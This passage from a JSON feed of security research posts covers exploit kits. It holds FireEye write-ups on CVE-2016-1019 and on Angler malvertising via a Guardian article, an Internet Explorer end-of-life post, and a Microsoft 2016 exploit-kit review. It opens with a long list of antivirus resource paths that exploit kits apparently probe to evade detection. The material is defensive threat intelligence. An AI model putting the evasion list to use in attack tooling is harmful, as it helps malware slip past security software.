\nres://\\Program%20Files\\Malwarebytes Anti-Malware\\mbamext.dll/#2/202 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Malware\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files\\Malwarebytes Anti-Malware\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200 \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/200 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\mbae.exe/#2/201 \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\mbae.exe/#2/201 \nres://\\Program%20Files%20(x86)\\Malwarebytes Anti-Exploit\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files\\Malwarebytes Anti-Exploit\\unins000.exe/#2/DISKIMAGE \nres://\\Program%20Files%20(x86)\\Trend Micro\\Titanium\\TmConfig.dll/#2/#30994 \nres://\\Program%20Files\\Trend Micro\\Titanium\\TmConfig.dll/#2/#30994 \nres://\\Program%20Files%20(x86)\\Trend Micro\\Titanium\\TmSystemChecking.dll/#2/#30994 \nres://\\Program%20Files\\Trend Micro\\Titanium\\TmSystemChecking.dll/#2/#30994 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0 for Windows Workstations\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0 for Windows Workstations\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Anti-Virus 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\shellex.dll/#2/#102 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2009\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2010\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2011\\avzkrnl.dll/#2/BBALL \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2012\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 2013\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Internet Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 14.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.1\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 15.0.2\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky Total Security 16.0.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 2.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky CRYSTAL 3.0\\x86\\mfc42.dll/#2/#26567 \nres://\\Program%20Files%20(x86)\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567 \nres://\\Program%20Files\\Kaspersky Lab\\Kaspersky PURE\\mfc42.dll/#2/#26567\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-07T12:30:00", "type": "fireeye", "title": "CVE-2016-1019: A New Flash Exploit Included in Magnitude Exploit Kit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419", "CVE-2016-1019"], "modified": "2016-04-07T12:30:00", "id": "FIREEYE:DE62068C8D7AE6B9EE810D02BC01433E", "href": "https://www.fireeye.com/blog/threat-research/2016/04/cve-2016-1019_a_new.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:18", "description": "##### **INTRODUCTION**\n\nFireEye Labs recently spotted a 2011 article on cybercrime from the news site theguardian[.]com that redirects users to the Angler Exploit Kit. Successful exploitation by Angler resulted in a malware infection for readers of the article. A spokesperson for the guardian[.]com responded that they \"are aware of FireEye's claims and are working to rectify the issue in question as soon as possible.\"\n\nFireEye Labs first detected the activity on Dec. 1, 2015. Ironically, the affected article was titled \u201cCybercrime: is it out of control?\u201d and covered various aspects of cybercrime. As it turns out, visiting the page shown in Figure 1 and Figure 2 silently redirected browsers to an Angler Exploit Kit landing page.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Guardian/guardianfig1.jpg)\n\nFigure 1. Article URL\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Guardian/guardianfig2.jpg)\n\nFigure 2. Image from main page, highlighting cybercrime issues\n\nThe article loaded several other pages and links, including links for syndication shown in Figure 3 and Figure 4.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Guardian/guardianfig3.jpg)\n\nFigure 3. Sharing and syndication links\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Guardian/guardianfig4.jpg)\n\nFigure 4. Syndication page URL\n\nWhen the syndication link is loaded in the background, readers are eventually redirected to Angler\u2019s landing page via injected HTML that crafts the request to the Angler landing page.\n\nVisible in the HTML response is the script that would craft the URL to the Angler landing page. (Figure 5)\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Guardian/guardianfig5.jpg)\n\nFigure 5. Injected script that loads the Angler landing page\n\nOnce loaded, the page would execute the embedded script and redirect the reader to the Angler landing page located at the URL in Figure 6:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Guardian/guardianfig6.jpg)\n\nFigure 6. Angler landing page URL\n\nThis redirect resulted in a new GET request (Figure 7) that loaded the landing page (Figure 8) and set up the exploitation stage.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Guardian/guardian7.jpg)\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Guardian/guardianfig8.jpg)\n\nFigure 7. Angler GET request, syndication link URL visible in Referrer field\n\n##### **EXPLOITS**\n\nOld exploits never die\u2026\n\nThe use of an OLE Automation vulnerability exploited through VBScript, along with evidence of potential Flash exploitation, can be observed in this particular attack.\n\nAngler unconditionally attempted to exploit a popular vulnerability: CVE-2014-6332. This is a memory corruption vulnerability in Windows Object Linking and Embedding (OLE) Automation, which can be triggered through VBScript with Internet Explorer as seen below.\n\nThe vulnerable code resided in OLEAUT32!SafeArrayRedim, where the original size of an array was not properly restored when an \u201cOut of memory\u201d error occured while resizing an array. This issue allowed for out-of-bounds memory access. In this attack the exploit was based on a publicly available PoC, and techniques from that PoC were used to attempt arbitrary code execution. Figure 8 shows Angler\u2019s obfuscated version of the CVE-2014-6332 vulnerability trigger.\n\n \n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Guardian/guardianfig9.jpg)\n\nFigure 8. Angler landing page contents\n\nAngler also unconditionally embedded a Flash object in the page at runtime. The FlashVars included crypto constants for D-H (g, u), and a URL to the payload (exec). Angler\u2019s server then decided whether to serve a Flash exploit, presumably based on information in the request like x-flash-version. \n \nThe de-obfuscated object tag used to embed Flash movie files can be seen below in Figure 9:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Guardian/guardianfig10.jpg)\n\nFigure 9. Angler CVE-2014-6332 triggering function\n\nIt was common practice for Angler to decide which, if any, Flash exploit to deliver to the target at runtime. Most recently, we observed Angler delivering a number of high profile exploits. These included, but were not limited to, CVE-2015-5122, CVE-2015-5560, and CVE-2015-7645.\n\nTypically, prior to conducting any exploitation on the system, Angler Exploit Kit attempted to detect whether Anti-Virus products or analysis tools are present. If Angler determined that such an object is present, it changed its behavior. For example, if Angler detected one such product, it invalidated its D-H parameters and the attack silently failed (Figure 10).\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Guardian/guardianfig11.jpg)\n\nFigure 10. Tag for Flash object from JavaScript\n\nAnother change bound to the presence of AV/analysis objects determines whether or not the malicious VBScript exploit is loaded. If detected, a non-malicious VBScript will be used instead. Or, it would if they remembered to unescape the string (Figure 11):\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Guardian/guardianfig12.jpg)\n\nFigure 11. Return appropriate result based on the AV vendor check\n\nThis attack was discovered in FireEye Dynamic Threat Intelligence. Additional syndication URLs are also redirecting to Angler (Figure 12):\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Guardian/guardianfig13.jpg)\n\nFigure 12. Constructing VBScript depending upon the presence of AV/analysis objects\n\nVisitors to the site are encouraged to use caution to avoid potentially becoming infected.\n", "edition": 2, "cvss3": {}, "published": "2015-12-09T12:00:00", "type": "fireeye", "title": "Cybercrime News Results In Cybercrime Blues", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2015-5122", "CVE-2015-5560", "CVE-2015-7645"], "modified": "2015-12-09T12:00:00", "id": "FIREEYE:50656CA8D413ED51CDE771F0BAB863B5", "href": "https://www.fireeye.com/blog/threat-research/2015/12/cybercrime-news.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "description": "Microsoft has started the year with an [announcement](<https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support>) that, effective Jan. 12, 2016, support for all older versions of Internet Explorer (IE) will come to an end (known as an EoL, or End of Life). The affected versions are Internet Explorer 7, 8, 9, and 10.\n\nWhat this means for users is that Microsoft will no longer release new security updates for these product versions going forward. This gives users two options: Internet Explorer 11 and Microsoft Edge, the latter of which is currently exclusive to Windows 10. If users would like to keep their browsers up to date, they will need to upgrade to either of these two options.\n\nIt should go without saying that Internet Explorer users are strongly encouraged to update to the latest version. It offers improved security with the latest security features and mitigations. Two notable mitigations introduced to the browser in 2014 are Isolated Heap and Memory Protect, which were implemented on Patch Tuesday of June and July 2014 respectively. Prior to that, Microsoft made a similar announcement about the Windows XP Operating System, wherein they issued an End of Life for XP in April 2014.\n\nThese are all steps in right direction for the Microsoft teams because it allows for the consolidation of team efforts, resulting in a stronger focus on securing fewer versions across a smaller code base. Microsoft continues to silently enhance protections as the months go by while at the same time trimming code.\n\nFigure 1 shows the vulnerability counts for Internet Explorer versions in 2015.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/EOL%20for%20IE%208%2C9%2C10/Figure%201.png)\n\nFigure 1. Internet Explorer vulnerability count for 2015 [1]\n\nThe graph above shows the total number of reported vulnerabilities affecting each version of Internet Explorer across the months of 2015. Keeping in mind that these are non-unique counts, we can observe that, for the most part, the majority of the reported vulnerabilities affected Internet Explorer 11.\n\nFigure 2 shows the most notable in the wild (ITW) attacks exploiting Internet Explorer in 2014 and 2015.\n\nYear\n\n| \n\nCVE\n\n| \n\nAffects \n \n---|---|--- \n \n2014\n\n| \n\n[CVE-2014-0322](<http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>)\n\n| \n\nIE 9 and 10 \n \n2014\n\n| \n\n[CVE-2014-1776](<http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html>)\n\n| \n\nIE 6 to 11 \n \n2015\n\n| \n\n[CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>)\n\n| \n\nIE 10 and 11 \n \n2015\n\n| \n\n[CVE-2015-2502](<http://krebsonsecurity.com/2015/08/microsoft-pushes-emergency-patch-for-ie/>)\n\n| \n\nIE 7 to 11 \n \nFigure 2. ITW attacks of Internet Explorer [1]\n\nThe majority of the attacks found ITW in 2014 and 2015 affected IE 11.\n\nFigure 3 compares the count of vulnerabilities that affect Internet Explorer 11 (IE 11) to the ones that don\u2019t.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/EOL%20for%20IE%208%2C9%2C10/Figure%203.png)\n\nFigure 3. IE11 vs. Non-IE11 vulnerability count [1]\n\nBased on the information found in Figures 1, 2, and 3, most of the vulnerabilities reported in 2015 affected Internet Explorer 11. This shows that attackers, as well as researchers, are focusing considerably on Internet Explorer 11. Microsoft\u2019s most recent move will allow the company to do the same.\n\nIt should be noted that, as of Internet Explorer 11, some features are no longer supported or are considered deprecated. These include, but are not limited to, [VML](<https://msdn.microsoft.com/en-us/library/hh801223\$v=vs.85\$.aspx>) and [VBScript](<https://msdn.microsoft.com/en-us/library/dn384057\$v=vs.85\$.aspx>), which have been used to [exploit](<http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php>) and [compromise](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx>) the integrity of Internet Explorer, or leveraged to bypass ASLR/DEP in the past. This is a strong move in the right direction, as trimming the code base leads to shrinking the attack surface. This helps secure products such as Internet Explorer.\n\nIt is also worth noting that at this point no ITW attacks have been observed against Microsoft Edge, the new web browser that currently ships exclusively with Windows 10. Microsoft Edge also follows the same approach of removing unnecessary features such as ActiveX and Browser Helper Objects, as well as [others](<https://blogs.windows.com/msedgedev/2015/05/06/a-break-from-the-past-part-2-saying-goodbye-to-activex-vbscript-attachevent/>).\n\nIn conclusion, after Jan. 12, 2016, older Internet Explorer users will be exposed to vulnerabilities that may be exploited by malware and targeted by Exploit Kits. The best way to defend against this is to keep your browser up to date by upgrading to Internet Explorer 11 or using Microsoft Edge.\n\n[1] Microsoft Security Bulletins: <https://technet.microsoft.com/en-us/library/security/dn610807.aspx>\n", "edition": 2, "cvss3": {}, "published": "2016-01-12T14:49:00", "type": "fireeye", "title": "End of Life for Internet Explorer 8, 9 and 10", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0322", "CVE-2015-2502", "CVE-2015-2419", "CVE-2014-1776"], "modified": "2016-01-12T14:49:00", "id": "FIREEYE:7D8237F41EA87865A58B16DF63389DAA", "href": "https://www.fireeye.com/blog/threat-research/2016/01/end_of_life_for_ie.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mmpc": [{"lastseen": "2017-06-30T15:02:20", "description": "Despite the disruption of Axpergle (Angler), which dominated the landscape in early 2016, exploit kits as a whole continued to be a threat to PCs running unpatched software. Some of the most prominent threats, from malvertising to ransomware, used exploit kits to infect millions of computers worldwide in 2016.\n\nThe prevalence of exploit kits as an infection vector can be attributed to these factors: 1) they continue to use old but effective exploits while efficiently integrating new ones, 2) they are easily obtained from underground cybercriminal markets; and 3) there remains a significant number of machines that are potentially vulnerable because they run unpatched software.\n\nUsing up-to-date browser and software remains to be the most effective mitigation against exploit kits. Upgrading to the latest versions and enabling automatic updates means patches are applied as soon as they are released.\n\n(Note: This blog post is the first in the 2016 threat landscape review series. In this blog series, we look back at how major areas in the threat landscape, including ransomware, macro malware, support scam malware, and unwanted software, have transformed over the past year. We will discuss trends that have emerged, as well as security solutions that tackle threats as they evolve.)\n\n## Meadgive gained ground as Axpergle is disrupted\n\nIn the first five months of 2016, [Axpergle](<https://blogs.technet.microsoft.com/mmpc/tag/axpergle/>) (also known as Angler exploit kit) infected around 100,000 machines monthly. However, sometime in June, the exploit kit vanished. Reports associated this development with the [arrest of 50 hackers in Russia](<http://www.securityweek.com/did-angler-exploit-kit-die-russian-lurk-arrests>).\n\nAxpergle is primarily associated with the delivery of the 32- and 64-bit versions of [Bedep](<https://blogs.technet.microsoft.com/mmpc/2016/04/12/msrt-april-release-features-bedep-detection/>), a backdoor that also downloads more complex and more dangerous malware, such as the information stealers [Ursnif](<https://blogs.technet.microsoft.com/mmpc/tag/ursnif/>) and [Fareit](<https://blogs.technet.microsoft.com/mmpc/tag/win32fareit/>).\n\n![exploit-kits-volume-by-family-2016-2](https://msdnshared.blob.core.windows.net/media/2017/01/Exploit-kits-volume-by-family-2016-2.png)\n\n_Figure 1. Monthly encounters by exploit kit family_\n\nThe disappearance of Axpergle made way for other exploit kits as cybercriminals presumably looked for alternatives. The Neutrino exploit kit started dominating for around three months, but scaled down in September. Reports say that Neutrino operators went into \u201cprivate\u201d mode, choosing to cater to select cybercriminal groups.\n\nA look at the year-long trend shows that [Meadgive](<https://blogs.technet.microsoft.com/mmpc/tag/meadgive/>) (also known as RIG exploit kit) filled the hole left by Axpergle and Neutrino (and Nuclear before them). By the end of 2016, while overall volume has gone down, most exploit kit activity can be attributed to Meadgive.\n\nMeadgive has been around since March 2014. Attackers who use Meadgive typically inject a malicious script island into compromised websites. When the compromised site is accessed, the malicious script, which is usually obfuscated, loads the exploit. Recently, Meadgive has primarily used an exploit for the Adobe Flash vulnerability CVE-2015-8651 that executes a JavaScript file, which then downloads an encrypted PE file.\n\nEven with the decreased activity, exploit kits continue to be a global threat, having been observed in more than 200 countries in 2016. They affect the following territories the most:\n\n 1. United States\n 2. Canada\n 3. Japan\n 4. United Kingdom\n 5. France\n 6. Italy\n 7. Germany\n 8. Taiwan\n 9. Spain\n 10. Republic of Korea\n\n![exploit-kits-geographic-distribution-2016](https://msdnshared.blob.core.windows.net/media/2017/01/Exploit-kits-geographic-distribution-2016.png)\n\n_Figure 2. Geographic distribution of exploit kit encounters_\n\n## Exploit kits in the ransomware trail\n\nAs exploit kits have become reliable means to deliver malware, it is not surprising that ransomware, currently the most prevalent malware, continue to use them as launch pads for infection.\n\nMeadgive, for instance, is known for delivering one of the most active ransomware in 2016. As late as December 2016, we documented new [Cerber](<https://blogs.technet.microsoft.com/mmpc/tag/cerber/>) ransomware versions being delivered through a [Meadgive exploit kit campaign](<https://blogs.technet.microsoft.com/mmpc/2016/12/21/no-slowdown-in-cerber-ransomware-activity-as-2016-draws-to-a-close/>), on top of a concurrent spam campaign.\n\nNeutrino, which temporarily dominated in 2016, is associated with another prominent ransomware family. Like Cerber, [Locky](<https://blogs.technet.microsoft.com/mmpc/tag/locky/>) also uses both exploit kits and spam email as vectors. With the decreased activity from Neutrino, we\u2019re seeing Locky being distributed more and more through spam campaigns.\n\n**Top malware families associated with exploit kits**\n\n**Malware family** | **Related exploit kit family** \n---|--- \n[Backdoor:Win32/Bedep](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Bedep>) | Axpergle (Angler) \n[Backdoor:Win64/Bedep](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Bedep>) | Axpergle (Angler) \n[Ransom:Win32/Cerber](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Cerber>) | Meadgive (RIG) \n[Ransom:Win32/Locky](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Locky>) | Neutrino \n[Trojan:Win32/Derbit](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Derbit.A>) | SundownEK \n \n## Integrating exploits at a slower rate\n\nWhile exploit kits rely on exploits for patched vulnerabilities, they also continually update their arsenal with newer exploits in the hope of casting bigger nets. This also allows them to take advantage of the window of opportunity between the release of a security fix and the time it is actually applied by users. Notably, the rate with which exploit kits integrate exploits for newly disclosed vulnerabilities is lower than in previous years.\n\nOf the major exploits used by kits in 2016, one is relatively old\u2014an exploit for a Microsoft Internet Explorer bug that was disclosed and patched back in 2014 (CVE-2014-6332). Four major kits use an exploit for the Adobe Flash vulnerability CVE-2015-8651, which was patched back in 2015.\n\nThree exploits disclosed in 2016 were seen in exploit kits, showing that operators still attempt continually improve their tools. One of these is a zero-day exploit for Adobe Flash (CVE-2016-1019) used by Pangimop at least five days before it was patched. However, this particular zero-day is a \u201cdegraded\u201d exploit, which means that it worked only on older versions of Adobe Flash. The exploit did not affect the latest version of the software at the time, because Adobe previously introduced stronger exploit mitigation, which Microsoft helped build.\n\n**Major exploits used by exploit kits**\n\n**Exploit** | **Targeted Product ** | ** Exploit kit** | **Date patched** | **Date first seen in exploit kit** \n---|---|---|---|--- \nCVE-2014-6332 | Microsoft Internet Explorer (OLE) | NeutrinoEK | November 11, 2014 ([MS14-064](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx?f=255&MSPPError=-2147217396>)) | November 19, 2014 \nCVE-2015-8651 | Adobe Flash | Axpergle, NeutrinoEK, Meadgive, SteganoEK | December 28, 2015 ([APSB16-01](<https://helpx.adobe.com/security/products/flash-player/apsb16-01.html>)_)_ | December 28, 2015 \nCVE-2016-0189 | Microsoft Internet Explorer | NeutrinoEK | May 10, 2016 ([MS16-051](<https://technet.microsoft.com/en-us/library/security/ms16-051.aspx>)) | July 14, 2016 \nCVE-2016-1019 | Adobe Flash | Pangimop, NeutrinoEK | April 7, 2016 ([ASPB16-10](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>)_)_ | April 2, 2016 (zero-day) \nCVE-2016-4117 | Adobe Flash | NeutrinoEK | May 12, 2016 ([ASPB16-15](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>)_)_ | May 21, 2016 \n \nWe did not see exploit kits targeting Microsoft\u2019s newest and most secure browser, Microsoft Edge, in 2016. Only a few days into the new year, however, SundownEK was updated to include an exploit for an old vulnerability that was patched a couple of months prior. Microsoft Edge applies patches automatically by default, rendering the exploit ineffective.\n\nIt 